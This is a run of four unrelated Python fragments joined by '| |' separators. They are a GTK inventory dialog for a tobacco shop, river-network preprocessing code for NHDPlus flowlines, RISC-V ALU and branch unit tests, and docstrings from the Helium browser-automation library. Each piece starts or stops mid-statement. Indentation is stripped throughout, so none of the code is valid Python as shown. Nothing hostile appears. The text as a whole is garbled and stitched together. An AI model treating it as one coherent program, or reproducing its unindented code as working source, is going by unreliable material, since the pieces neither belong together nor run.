self.result = (tipo, self.dataEntry.data)
self.u88Dialog.destroy()
def close(self, widget, other=None):
self.u88Dialog.destroy()
class TabacchiDialog(utility.GladeWindow):
MAGAZZINO_TAB, LISTINO_TAB = (0, 1)
IN_MAGAZZINO, ID, DESCRIZIONE, TIPO, PREZZO_PEZZO, DECORRENZA, LIVELLO_MIN, PEZZI_UNITA_MIN, UNITA_MIN, PREZZO_KG, BARCODE, DIRTY = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
MODEL_INFO_LIST = [
("*Magazzino", "bool", IN_MAGAZZINO),
(None, "str", ID),
("^!+Descrizione", "str", DESCRIZIONE),
("^Tipo", "str", TIPO),
(None, "currency", PREZZO_PEZZO),
(None, "float", LIVELLO_MIN),
("*Pezzi", "int#3,0", PEZZI_UNITA_MIN),
("Unità min.", "float", UNITA_MIN),
("Prezzo Kg", "currency", PREZZO_KG),
(None, "str", BARCODE),
("^Decorrenza", "date", DECORRENZA),
(None, "bool", DIRTY)]
MODEL_INFO_LIST_MAGAZZINO = [
(None, "bool", IN_MAGAZZINO),
("Codice", "str", ID),
("!+Descrizione", "str", DESCRIZIONE),
("Tipo", "str", TIPO),
("Prezzo", "currency", PREZZO_PEZZO),
("*Livello", "float#3,3/i8,0,12", LIVELLO_MIN),
(None, "int", PEZZI_UNITA_MIN),
(None, "float", UNITA_MIN),
(None, "currency", PREZZO_KG),
("*Barcode", "str", BARCODE),
(None, "date", DECORRENZA),
(None, "bool", DIRTY)]
def __init__(self, parent):
super().__init__(parent, "tabacchiDialog.glade")
self.dirtyFlag = False
self.data = prefs.dataCatalogo
self.readBarcodeThread = None
self.barcodeDict = dict()
self.deleteList = []
self.tabacchiDialog = self.builder.get_object("tabacchiDialog")
self.tabacchiNotebook = self.builder.get_object("tabacchiNotebook")
self.bluetoothStatusImage = self.builder.get_object('bluetoothStatusImage')
self.listinoTreeView = self.builder.get_object("listinoTreeView")
self.magazzinoTreeView = self.builder.get_object("magazzinoTreeView")
self.tabacchiDialog.set_transient_for(parent)
listino_callbacks = {self.IN_MAGAZZINO: self.__toggledCallback, self.PEZZI_UNITA_MIN: self.onListinoCellEdited}
magazzino_callbacks = {self.BARCODE: self.onBarcodeCellEdited, self.LIVELLO_MIN: self.onCellEdited}
magazzino_properties = {self.ID: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL}, self.TIPO: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}, self.BARCODE: {
"xalign": 1, "style": Pango.Style.ITALIC, "scale": utility.PANGO_SCALE_SMALL}, self.DECORRENZA: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}}
listino_properties = {self.DESCRIZIONE: {"scale": utility.PANGO_SCALE_SMALL},
self.TIPO: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL},
self.DECORRENZA: {"xalign": 0.5, "scale": utility.PANGO_SCALE_SMALL}}
utility.ExtTreeView(self.MODEL_INFO_LIST, self.listinoTreeView, edit_callbacks=listino_callbacks, properties=listino_properties)
self.listinoModel = self.listinoTreeView.get_model()
self.magazzinoModel = self.listinoModel.filter_new()
self.magazzinoModel.set_visible_column(0)
utility.ExtTreeView(self.MODEL_INFO_LIST_MAGAZZINO, self.magazzinoTreeView, modelCallback=self.modelCallback,
edit_callbacks=magazzino_callbacks, properties=magazzino_properties)
# Prima di caricare i dati nel modello, lo "sgancio" dalla Treeview
self.listinoTreeView.set_model(None)
self.magazzinoTreeView.set_model(None)
# Legge da db i dati nel modello
self.loadListino(self.listinoModel)
# Finita la lettura da DB lo "riaggancio" alla Treeview
self.magazzinoTreeView.set_model(self.magazzinoModel)
self.listinoTreeView.set_model(self.listinoModel)
self.updateTitle()
self.listinoTreeView.connect("row-activated", self.changeView)
self.magazzinoTreeView.connect("row-activated", self.changeView)
self.builder.connect_signals({"on_tabacchiDialog_delete_event": self.forcedClose,
"on_updateButton_clicked": self.updateCatalogo,
"on_okButton_clicked": self.close,
"on_barcodeToolbutton_clicked": self.enableBarcode,
"on_cancelButton_clicked": self.forcedClose})
self.bluetoothStatusImage.hide()
def modelCallback(self, model):
return self.magazzinoModel
def onBarcodeCellEdited(self, widget, path, value, model, col_id):
self.__changeBarcode(value, path, model)
def onCellEdited(self, widget, path, value, model, col_id):
parent_path = model.convert_path_to_child_path(Gtk.TreePath.new_from_string(path))
parent_model = model.get_model()
parent_model[parent_path][col_id] = value
parent_model[parent_path][self.DIRTY] = True
self.dirtyFlag = True
def onListinoCellEdited(self, widget, path, value, model, col_id):
model[path][col_id] = value
model[path][self.DIRTY] = True
self.dirtyFlag = True
def __changeBarcode(self, barcode, path, model):
barcode.strip()
if (barcode in self.barcodeDict):
msgDialog = Gtk.MessageDialog(parent=self.tabacchiDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.OK, text="Codice a barre già associato:")
msgDialog.format_secondary_text("%s" % self.barcodeDict[barcode])
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
parent_path = model.convert_path_to_child_path(Gtk.TreePath.new_from_string(path))
parent_model = model.get_model()
old_barcode = parent_model[parent_path][self.BARCODE]
if len(old_barcode) > 0:
del self.barcodeDict[old_barcode]
if len(barcode) > 0:
self.barcodeDict[barcode] = parent_model[parent_path][self.DESCRIZIONE]
parent_model[parent_path][self.BARCODE] = barcode
parent_model[parent_path][self.DIRTY] = True
self.dirtyFlag = True
def __toggledCallback(self, widget, path, | |
(likely most common case)
elif len(v) == 1:
tocomids[k] = v.pop()
# comid is an outlet
elif len(v) == 0:
tocomids[k] = 0
# comid routes to multiple comids (diversion)
else:
# downstream elevations
tocomids_c = list(v)
dnelevs = [div_elevs.get(toid, 99999) for toid in tocomids_c]
# downstream elevations unique to 2 decimal places
unique_dnelevs = set(np.round(dnelevs, 2))
# primary distributary
# if any of the downstream values are nans, or they are all the same
# keep the NHD main channel
if any(np.isnan(dnelevs)) or len(unique_dnelevs) == 1:
# Divergence == 1 is the main stemp, Divergence == 2 is minor
# (see NHDPlus v2 User's Guide)
info = flcc.loc[tocomids_c, 'Divergence'].sort_values()
assert info.values[0] == 1
tocomids[k] = info.index[0]
#tocomids[k] = flcc.loc[tocomids_c, 'Divergence'].sort_values().index[0]
else:
tocomids[k] = np.array(tocomids_c)[np.nanargmin(dnelevs)]
# secondary distributaries
diversionminorcomids.update(v.difference({tocomids[k]}))
# update the routing graphs
# set tocomids to zero if there's no flowline
graph = {k: v if v in flcc.index else 0 for k, v in tocomids.items()}
graph_r = make_graph(list(graph.values()), list(graph.keys()))
flcc['tocomid'] = [graph.get(c, 0) for c in flcc.index]
# drop comids not in the model
diversionminorcomids = diversionminorcomids.intersection(flcc.index)
# drop comids that are routed to
# (aren't minor distributaries if they have another trib routing to them)
diversionminorcomids = diversionminorcomids.difference(flcc.tocomid)
# label secondary distributaries
flcc['main_chan'] = True
flcc.loc[diversionminorcomids, 'main_chan'] = False
# verify that all comids only route to one other comid
assert np.all([np.isscalar(v) for v in tocomids.values()])
logger.log('Determining routing at divergences using elevations sampled from the dem')
# Update comid start values using new routing
# use the 1st percentile elevation values to avoid outliers
# (spurious values in the DEM)
logger.log('Updating elevation values with 1st percentile sampled from the dem')
elevs = dict(zip(flcc.COMID, flcc['pct01']))
# update the elevations with any specified elevations
# for up elevations, update the elevations of the next lines upstream
if update_up_elevations is not None:
for comid, elev in update_up_elevations.items():
fromcomids = graph_r[comid]
for comid in fromcomids:
elevs[comid] = elev
# ensure that there aren't any lower elevations upstream
all_upstream_comids = get_upsegs(graph_r, comid)
for comid in all_upstream_comids:
if elevs[comid] < elev:
elevs[comid] = elev
# for dn elevations, update the elevation for that line
if update_dn_elevations is not None:
for comid, elev in update_dn_elevations.items():
elevs[comid] = elev
# ensure that there aren't any lower elevations upstream
# include any co-tributaries
tocomid = flcc.loc[comid, 'tocomid']
cotribs = set(flcc.loc[flcc['tocomid'] == tocomid].index)
all_upstream_comids = set()
for comid in cotribs:
elevs[comid] = elev
cotribs_upstream_comids = get_upsegs(graph_r, comid)
all_upstream_comids.update(cotribs_upstream_comids)
for comid in all_upstream_comids:
if elevs[comid] < elev:
elevs[comid] = elev
elevup = {}
cm_to_output_units = convert_length_units('cm', output_length_units)
# dictionary of NHDPlus minimum values converted to output units
elevslope_dict = dict(zip(elevslope.COMID, elevslope.MINELEVSMO * cm_to_output_units))
# screen for comids outside model
valid_comids = {k for k, v in elevs.items() if minelev < v < 1e5}
for tocomid, fromcomids in graph_r.items():
# if len(fromcomids) > 0:
fromcomids = fromcomids.intersection(valid_comids)
if len(fromcomids) > 0:
elevup[tocomid] = np.min([elevs[c] for c in fromcomids])
elif tocomid in valid_comids:
elevup[tocomid] = elevs[tocomid]
flcc['elevup'] = [elevup.get(c) for c in flcc.index]
flcc['elevdn'] = [elevs[c] if -10 < elevs[c] < 1e5 else elevslope_dict[c] for c in flcc.index]
noelevup = np.isnan(flcc.elevup)
flcc.loc[noelevup, 'elevup'] = flcc.loc[noelevup, 'elevdn']
logger.log('Updating elevation values with 1st percentile sampled from the dem')
# smooth segment end values so that they never rise downstream
logger.log('Smoothing updated elevations')
elevminsmo, elevmaxsmo = smooth_elevations(flcc.index.values, flcc.tocomid.values,
flcc.elevdn.values, flcc.elevup.values)
flcc['elevupsmo'] = [elevmaxsmo[c] for c in flcc.index]
flcc['elevdnsmo'] = [elevminsmo[c] for c in flcc.index]
# verify that end values less than start values
assert np.all(flcc.elevdnsmo <= flcc.elevupsmo)
# verify that values don't rise at segment connections
elevupsmo = dict(zip(flcc.index, flcc.elevupsmo))
nextup = np.array([elevupsmo.get(graph.get(c, -10), -10) for c in flcc.index])
assert np.all(nextup <= flcc.elevdnsmo.values)
logger.log('Smoothing updated elevations')
# subtract secondary distributaries
nhdplus_asums = dict(zip(pfvaa.index, pfvaa.ArbolateSu))
fl_lengths = fl.LENGTHKM.to_dict()
logger.log('Recomputing arbolate sums')
# NHDPlus asums are the default
asum_calc = nhdplus_asums.copy()
# recompute the arbolate sums so that minor distributaries start at 0
# only recompute at minor distributaries because of missing lines (that have already been culled)
# also issues with double-counting asums from distributaries along the model edge
new_minor_distrib_asums = recompute_asums_for_minor_distribs(diversionminorcomids,
fl_lengths,
graph, graph_r)
asum_calc.update(new_minor_distrib_asums)
# recompute arbolate sums at and downstream of places where it decreases
# decreases are caused by routing connections that were not in NHDPlus
fixed_invalid_asums = fix_invalid_asums(asum_calc, fl_lengths, graph, graph_r)
asum_calc.update(fixed_invalid_asums)
flcc['asum_calc'] = [asum_calc[c] for c in flcc.index]
logger.log('Recomputing arbolate sums')
# cull flow paths below minor distributaries
# until they reach the arbolate sum threshold
logger.statement('Culling minor distributary flowlines < {} km from divergence...'.format(asum_thresh))
to_drop = flcc.loc[flcc.asum_calc < asum_thresh, :].index
flcc.drop(to_drop, axis=0, inplace=True)
flcc['asum_diff'] = flcc.nhd_asum - flcc.asum_calc
# estimate channel width using arbolate sum relationship
logger.statement('Populating channel widths...')
logger.statement('width = {} * arbolate sum (meters) ^ {}'.format(width_from_asum_a_param,
width_from_asum_b_param))
flcc['width1asum'] = width_from_arbolate_sum(flcc['asum_calc'].values - flcc['LENGTHKM'].values,
a=width_from_asum_a_param,
b=width_from_asum_b_param,
minimum_width=minimum_width,
input_units='km', output_units=output_length_units)
flcc['width2asum'] = width_from_arbolate_sum(flcc['asum_calc'].values,
a=width_from_asum_a_param,
b=width_from_asum_b_param,
minimum_width=minimum_width,
input_units='km', output_units=output_length_units)
if narwidth_shapefile is not None:
if not os.path.exists(narwidth_shapefile):
raise IOError("narwidth_shapefile: {} not found!".format(narwidth_shapefile))
# sample widths for wider streams from NARWidth
logger.log('Sampling widths from NARWidth database')
logger.log_package_version('rtree')
narwidth_crs = get_crs(narwidth_shapefile)
narwidth_bounds = project(flowline_bounds, flowline_crs, narwidth_crs)
sample_NARWidth(flcc, narwidth_shapefile,
waterbodies=waterbody_shapefiles,
filter=narwidth_bounds,
crs=project_crs,
output_width_units=output_length_units)
logger.log('Sampling widths from NARWidth database')
flcc['width1'] = flcc.width1asum
flcc['width2'] = flcc.width2asum
frac_narwidth = np.sum(~np.isnan(flcc.narwd_mean))/len(flcc)
logger.statement('Flowline widths estimated from arbolate sum: {0:.1%}'.format(1-frac_narwidth), log_time=False)
logger.statement('Flowline widths sampled from NARWidth: {0:.1%}'.format(frac_narwidth), log_time=False)
flcc.loc[~np.isnan(flcc.narwd_mean), 'width1'] = flcc.loc[~np.isnan(flcc.narwd_mean), 'narwd_mean']
flcc.loc[~np.isnan(flcc.narwd_mean), 'width2'] = flcc.loc[~np.isnan(flcc.narwd_mean), 'narwd_mean']
if active_area is not None:
flcc = clip_flowlines_to_polygon(flcc, active_area,
flowlines_epsg=project_epsg,
simplify_tol=100, logger=logger)
# write output files; record timestamps in logger
logger.statement('writing output')
df2shp(flcc.drop('buffpoly', axis=1),
'{}/flowlines_gt{:.0f}km_edited.shp'.format(outfolder, asum_thresh),
index=False, epsg=project_epsg)
logger.log('Preprocessing Flowlines')
return flcc
def clip_flowlines_to_polygon(flowlines, polygon,
flowlines_epsg=None, crs=None,
simplify_tol=100, logger=None):
"""Clip line features in a flowlines DataFrame to polygon
features in polygon.
Parameters
----------
flowlines : DataFrame
Output from :func:`~sfrmaker.preprocessing.preprocess_nhdplus`
crs : obj
Coordinate reference system of flowlines. Only needed if
the data do not have a valid ESRI projection (.prj) file.
A Python int, dict, str, or :class:`pyproj.crs.CRS` instance
passed to :meth:`pyproj.crs.CRS.from_user_input`
Can be any of:
- PROJ string
- Dictionary of PROJ parameters
- PROJ keyword arguments for parameters
- JSON string with PROJ parameters
- CRS WKT string
- An authority string [i.e. 'epsg:4326']
- An EPSG integer code [i.e. 4326]
- A tuple of ("auth_name": "auth_code") [i.e ('epsg', '4326')]
- An object with a `to_wkt` method.
- A :class:`pyproj.crs.CRS` class
By default, None
polygon : str
Polygon shapefile, shapely polygon or list of shapely polygons of model active area. Shapely polygons
must be in the same CRS as flowlines; shapefiles will be automatically reprojected.
simplify_tol : float
Simplification tolerance for ``polygon`` to speed clipping.
See :doc:`shapely:manual` for more details.
logger : Logger instance
Returns
-------
flc : clipped flowlines dataframe
"""
if logger is None:
logger = Logger()
# read in the active area and to_crs to same crs as flowlines
flowlines_crs = None
if flowlines_epsg is not None:
flowlines_crs = get_crs(epsg=flowlines_epsg, crs=crs)
active_area_polygon = read_polygon_feature(polygon, flowlines_crs)
# simplify polygon vertices to speed intersection testing
# (can be very slow for polygons generated from rasters)
active_area_polygon = active_area_polygon.buffer(simplify_tol).simplify(simplify_tol)
logger.log('Culling flowlines outside of {}'.format(polygon))
lines = flowlines.geometry.tolist()
print('starting lines: {:,d}'.format(len(lines)))
intersects = [g.intersects(active_area_polygon) for g in lines]
flc = flowlines.loc[intersects].copy()
flc['geometry'] = [g.intersection(active_area_polygon) for g in flc.geometry]
drop = np.array([g.is_empty for g in flc.geometry.tolist()])
if len(drop) > 0:
flc = flc.loc[~drop]
print('remaining lines: {:,d}'.format(len(flc)))
logger.log('Culling flowlines outside of {}'.format(polygon))
return flc
def sample_NARWidth(flowlines, narwidth_shapefile, waterbodies,
filter=None,
flowlines_epsg=None, crs=None,
output_width_units='meters',
outpath='shps/'):
"""
Sample the North American River Width Database by
doing a spatial join (transfer width information from
NARWidth shapefile to flowlines shapefile based on proximity).
Parameters
----------
flowlines : DataFrame
flowlines dataframe from preprocess_nhdplus().
Flowlines must be in a projected Coordinate reference system (CRS).
narwidth_shapefile : str
Path to shapefile from the NARWidth database (Allen and Pavelsky, 2015).
waterbody_shapefiles : str or list of strings, optional
Path(s) to NHDPlus NHDWaterbody shapefile(s). Only required if a
| |
rs2=0, imm=14, pc=0, f3=0b101, f7=0)
assert res == 0x00008484
# SRAI
res = ex.alu(opcode=0b00100, rs1=0x7fffffff, rs2=0, imm=0, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x7fffffff
res = ex.alu(opcode=0b00100, rs1=0x7fffffff, rs2=0, imm=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x3fffffff
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xc0c0c0c0
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=7, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xff030303
res = ex.alu(opcode=0b00100, rs1=0x81818181, rs2=0, imm=31, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xffffffff
# ADD
res = ex.alu(opcode=0b01100, rs1=0x42, rs2=0x4593, imm=0, pc=0, f3=0b000, f7=0)
assert res == 0x45D5
# SUB
res = ex.alu(opcode=0b01100, rs1=0, rs2=0, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=1, rs2=1, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=3, rs2=7, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0xfffffffc
res = ex.alu(opcode=0b01100, rs1=0, rs2=0xffff8000, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x00008000
res = ex.alu(opcode=0b01100, rs1=0, rs2=0x00007fff, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0xffff8001
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, rs2=0xffff8000, imm=0, pc=0, f3=0b000, f7=0b0100000)
assert res == 0x80007fff
# SLL
res = ex.alu(opcode=0b01100, rs1=1, rs2=0, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000001
res = ex.alu(opcode=0b01100, rs1=1, rs2=1, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000002
res = ex.alu(opcode=0b01100, rs1=1, rs2=7, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x00000080
res = ex.alu(opcode=0b01100, rs1=1, rs2=31, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x80000000
res = ex.alu(opcode=0b01100, rs1=0xffffffff, rs2=7, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0xffffff80
res = ex.alu(opcode=0b01100, rs1=0x21212121, rs2=14, imm=0, pc=0, f3=0b001, f7=0b0000000)
assert res == 0x48484000
# SLT
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=1, imm=0, rs2=1, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=3, imm=0, rs2=7, pc=0, f3=0b010, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0, pc=0, f3=0b010, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=0xfffff800, pc=0, f3=0b010, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0xfffff800, pc=0, f3=0b010, f7=0)
assert res == 0
# SLTU
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=1, imm=0, rs2=1, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=3, imm=0, rs2=7, pc=0, f3=0b011, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=7, imm=0, rs2=3, pc=0, f3=0b011, f7=0)
assert res == 0
res = ex.alu(opcode=0b01100, rs1=0, imm=0, rs2=0xfffff800, pc=0, f3=0b011, f7=0)
assert res == 1
res = ex.alu(opcode=0b01100, rs1=0x80000000, imm=0, rs2=0xfffff800, pc=0, f3=0b011, f7=0)
assert res == 1
# XOR
res = ex.alu(opcode=0b01100, rs1=0x00ff0f00, rs2=0xffffff0f, imm=0, pc=0, f3=0b100, f7=0)
assert res == 0xff00f00f
res = ex.alu(opcode=0b01100, rs1=0x00ff08ff, rs2=0x0000070f, imm=0, pc=0, f3=0b100, f7=0)
assert res == 0x00ff0ff0
# SRL
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=0, pc=0, f3=0b101, f7=0)
assert res == 0x00000001
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=1, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=7, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0x00000001, imm=0, rs2=31, pc=0, f3=0b101, f7=0)
assert res == 0x00000000
res = ex.alu(opcode=0b01100, rs1=0xffffffff, imm=0, rs2=7, pc=0, f3=0b101, f7=0)
assert res == 0x01ffffff
res = ex.alu(opcode=0b01100, rs1=0x21212121, imm=0, rs2=14, pc=0, f3=0b101, f7=0)
assert res == 0x00008484
# SRA
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=0, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x7fffffff
res = ex.alu(opcode=0b01100, rs1=0x7fffffff, imm=0, rs2=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0x3fffffff
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=1, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xc0c0c0c0
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=7, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xff030303
res = ex.alu(opcode=0b01100, rs1=0x81818181, imm=0, rs2=31, pc=0, f3=0b101, f7=0b0100000)
assert res == 0xffffffff
# OR
res = ex.alu(opcode=0b01100, rs1=0xff00ff00, imm=0, rs2=0xffffff0f, pc=0, f3=0b110, f7=0)
assert res == 0xffffff0f
res = ex.alu(opcode=0b01100, rs1=0x00ff00ff, imm=0, rs2=0x0000070f, pc=0, f3=0b110, f7=0)
assert res == 0x00ff07ff
# AND
res = ex.alu(opcode=0b01100, rs1=0xff00ff00, imm=0, rs2=0xffffff0f, pc=0, f3=0b111, f7=0)
assert res == 0xff00ff00
res = ex.alu(opcode=0b01100, rs1=0x00ff00ff, imm=0, rs2=0x0000070f, pc=0, f3=0b111, f7=0)
assert res == 0x0000000f
def test_branch(self):
ex = EXStage()
# BEQ
res = ex.branch(f3=0, rs1=0, rs2=0)
assert res == True
res = ex.branch(f3=0, rs1=1, rs2=1)
assert res == True
res = ex.branch(f3=0, rs1=-1, rs2=-1)
assert res == True
res = ex.branch(f3=0, rs1=0, rs2=1)
assert res == False
res = ex.branch(f3=0, rs1=1, rs2=0)
assert res == False
res = ex.branch(f3=0, rs1=-1, rs2=1)
assert res == False
# BNE
res = ex.branch(f3=1, rs1=0, rs2=0)
assert res == False
res = ex.branch(f3=1, rs1=1, rs2=1)
assert res == False
res = ex.branch(f3=1, rs1=-1, rs2=-1)
assert res == False
res = ex.branch(f3=1, rs1=0, rs2=1)
assert res == True
res = ex.branch(f3=1, rs1=1, rs2=0)
assert res == True
res = ex.branch(f3=1, rs1=-1, rs2=1)
assert res == True
# BLT
res = ex.branch(f3=4, rs1=0, rs2=1)
assert res == True
res = ex.branch(f3=4, rs1=MASK_32&(-1), rs2=1)
assert res == True
res = ex.branch(f3=4, rs1=MASK_32&(-2), rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=4, rs1=1, rs2=0)
assert res == False
res = ex.branch(f3=4, rs1=1, rs2=MASK_32&(-1))
assert res == False
res = ex.branch(f3=4, rs1=MASK_32&(-1), rs2=MASK_32&(-2))
assert res == False
res = ex.branch(f3=4, rs1=1, rs2=MASK_32&(-2))
assert res == False
# BGE
res = ex.branch(f3=5, rs1=0, rs2=0)
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=1)
assert res == True
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=0)
assert res == True
res = ex.branch(f3=5, rs1=1, rs2=MASK_32&(-1))
assert res == True
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=MASK_32&(-2))
assert res == True
res = ex.branch(f3=5, rs1=0, rs2=1)
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-1), rs2=1)
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-2), rs2=MASK_32&(-1))
assert res == False
res = ex.branch(f3=5, rs1=MASK_32&(-2), rs2=1)
assert res == False
# BLTU
res = ex.branch(f3=6, rs1=0x00000000, rs2=0x00000001)
assert res == True
res = ex.branch(f3=6, rs1=0xfffffffe, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=6, rs1=0x00000000, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=6, rs1=0x00000001, rs2=0x00000000)
assert res == False
res = ex.branch(f3=6, rs1=0xffffffff, rs2=0xfffffffe)
assert res == False
res = ex.branch(f3=6, rs1=0xffffffff, rs2=0x00000000)
assert res == False
res = ex.branch(f3=6, rs1=0x80000000, rs2=0x7fffffff)
assert res == False
# BGEU
res = ex.branch(f3=7, rs1=0x00000000, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0x00000001, rs2=0x00000001)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0xffffffff)
assert res == True
res = ex.branch(f3=7, rs1=0x00000001, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0xfffffffe)
assert res == True
res = ex.branch(f3=7, rs1=0xffffffff, rs2=0x00000000)
assert res == True
res = ex.branch(f3=7, rs1=0x00000000, rs2=0x00000001)
assert res == False
res = ex.branch(f3=7, rs1=0xfffffffe, rs2=0xffffffff)
assert res == False
res = ex.branch(f3=7, rs1=0x00000000, rs2=0xffffffff)
assert res == False
res = ex.branch(f3=7, rs1=0x7fffffff, rs2=0x80000000)
assert res == False
def test_EXStage(self):
ex = EXStage()
# Test pass throughs
ex.IDEX_i.write('rd', 24,
'we', True,
'wb_sel', 2,
'rs2', 0xdeadbeef,
'mem', 2,
'funct3', 5)
#ex.process()
out = ex.EXMEM_o.read()
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 2
assert out['rs2'] == 0xdeadbeef
assert out['mem'] == 2
assert out['funct3'] == 5
# LUI x24, 0xaffe
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0xaffe<<12,
'pc', 0,
'rd', 24,
'we', True,
'wb_sel', 0,
'opcode', 0b01101)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == False
assert out['alu_res'] == 0xaffe<<12
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 0
# AUIPC x24, 0xaffe
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0xaffe<<12,
'pc', 0x80000000,
'rd', 24,
'we', True,
'wb_sel', 0,
'opcode', 0b00101)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == False
assert out['alu_res'] == 0x8AFFE000
assert out['rd'] == 24
assert out['we'] == True
assert out['wb_sel'] == 0
# JAL x13, 0x2DA89
ex.IDEX_i.write('rs1', 0,
'rs2', 0,
'imm', 0x2DA89<<1,
'pc', 0x80004000,
'rd', 13,
'we', True,
'wb_sel', 1,
'opcode', 0b11011)
ex.process()
out = ex.EXMEM_o.read()
assert out['take_branch'] == True
assert out['alu_res'] == 0x8005F512
assert out['rd'] == 13
assert out['we'] == True
assert out['wb_sel'] == 1
assert out['pc4'] == 0x80004004
# JALR x13, x28, 0x401 (note: reg x28 not explictly needed; | |
"""
Helium's API is contained in module ``helium``. It is a simple Python API that
makes specifying web automation cases as simple as describing them to someone
looking over their shoulder at a screen.
The public functions and classes of Helium are listed below. If you wish to use
Helium functions in your Python scripts you can import them from the
``helium`` module::
from helium import *
"""
from collections import namedtuple, OrderedDict
from copy import copy
from helium._impl import APIImpl
from helium._impl.util.html import get_easily_readable_snippet
from helium._impl.util.inspect_ import repr_args
from selenium.webdriver.common.keys import Keys
import helium._impl
def start_chrome(url=None, headless=False, maximize=False, options=None):
"""
:param url: URL to open.
:type url: str
:param headless: Whether to start Chrome in headless mode.
:type headless: bool
:param maximize: Whether to start Chrome window in maximized mode.
:type maximize: bool
:param options: ChromeOptions to use for starting the browser
:type options: :py:class:`selenium.webdriver.ChromeOptions`
Starts an instance of Google Chrome::
start_chrome()
If this doesn't work for you, then it may be that Helium's copy of
ChromeDriver is not compatible with your version of Chrome. To fix this,
place a copy of ChromeDriver on your `PATH`.
You can optionally open a URL::
start_chrome("google.com")
The `headless` switch lets you prevent the browser window from appearing on
your screen::
start_chrome(headless=True)
start_chrome("google.com", headless=True)
For more advanced configuration, use the `options` parameter::
from selenium.webdriver import ChromeOptions
options = ChromeOptions()
options.add_argument('--proxy-server=172.16.17.32:5678')
start_chrome(options=options)
On shutdown of the Python interpreter, Helium cleans up all resources used
for controlling the browser (such as the ChromeDriver process), but does
not close the browser itself. If you want to terminate the browser at the
end of your script, use the following command::
kill_browser()
"""
return _get_api_impl().start_chrome_impl(url, headless, maximize, options)
def start_firefox(url=None, headless=False, options=None):
"""
:param url: URL to open.
:type url: str
:param headless: Whether to start Firefox in headless mode.
:type headless: bool
:param options: FirefoxOptions to use for starting the browser.
:type options: :py:class:`selenium.webdriver.FirefoxOptions`
Starts an instance of Firefox::
start_firefox()
If this doesn't work for you, then it may be that Helium's copy of
geckodriver is not compatible with your version of Firefox. To fix this,
place a copy of geckodriver on your `PATH`.
You can optionally open a URL::
start_firefox("google.com")
The `headless` switch lets you prevent the browser window from appearing on
your screen::
start_firefox(headless=True)
start_firefox("google.com", headless=True)
